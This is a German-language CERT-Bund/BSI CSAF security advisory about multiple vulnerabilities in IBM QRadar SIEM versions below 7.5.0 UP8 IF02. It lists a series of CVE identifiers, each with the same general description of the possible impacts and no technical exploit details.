Action not permitted
Modal body text goes here.
wid-sec-w-2024-1086
Vulnerability from csaf_certbund
Published
2024-05-09 22:00
Modified
2024-05-09 22:00
Summary
IBM QRadar SIEM: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting (XSS)-Angriff durchzuführen oder einen nicht spezifizierten Angriff auszuführen.
Betroffene Betriebssysteme
- Linux
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "IBM QRadar Security Information and Event Management (SIEM) bietet Unterst\u00fctzung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting (XSS)-Angriff durchzuf\u00fchren oder einen nicht spezifizierten Angriff auszuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-1086 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1086.json" }, { "category": "self", "summary": "WID-SEC-2024-1086 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1086" }, { "category": "external", "summary": "IBM Security Bulletin 7150684 vom 2024-05-09", "url": "https://www.ibm.com/support/pages/node/7150684" } ], "source_lang": "en-US", "title": "IBM QRadar SIEM: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-05-09T22:00:00.000+00:00", "generator": { "date": "2024-05-10T10:02:58.886+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2024-1086", "initial_release_date": "2024-05-09T22:00:00.000+00:00", "revision_history": [ { "date": "2024-05-09T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c 7.5.0 UP8 IF02", "product": { "name": "IBM QRadar SIEM \u003c 7.5.0 UP8 IF02", "product_id": "T034673", "product_identification_helper": { "cpe": "cpe:/a:ibm:qradar_siem:7.5.0_up8_if02" } } } ], "category": "product_name", "name": "QRadar SIEM" } ], "category": "vendor", "name": "IBM" } ] }, "vulnerabilities": [ { "cve": "CVE-2007-4559", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2007-4559" }, { "cve": "CVE-2014-3146", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2014-3146" }, { "cve": "CVE-2018-19787", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2018-19787" }, { "cve": "CVE-2019-13224", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-13224" }, { "cve": "CVE-2019-16163", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-16163" }, { "cve": "CVE-2019-19012", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-19012" }, { "cve": "CVE-2019-19203", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-19203" }, { "cve": "CVE-2019-19204", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-19204" }, { "cve": "CVE-2019-8675", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-8675" }, { "cve": "CVE-2019-8696", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2019-8696" }, { "cve": "CVE-2020-10001", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2020-10001" }, { "cve": "CVE-2020-27783", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2020-27783" }, { "cve": "CVE-2020-3898", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2020-3898" }, { "cve": "CVE-2021-33631", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2021-33631" }, { "cve": "CVE-2021-43618", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2021-43618" }, { "cve": "CVE-2021-43818", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2021-43818" }, { "cve": "CVE-2021-43975", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2021-43975" }, { "cve": "CVE-2022-26691", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-26691" }, { "cve": "CVE-2022-28388", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-28388" }, { "cve": "CVE-2022-3545", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-3545" }, { "cve": "CVE-2022-3594", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-3594" }, { "cve": "CVE-2022-3640", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-3640" }, { "cve": "CVE-2022-36402", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-36402" }, { "cve": "CVE-2022-38096", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2022-38096" }, { "cve": "CVE-2022-38457", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern 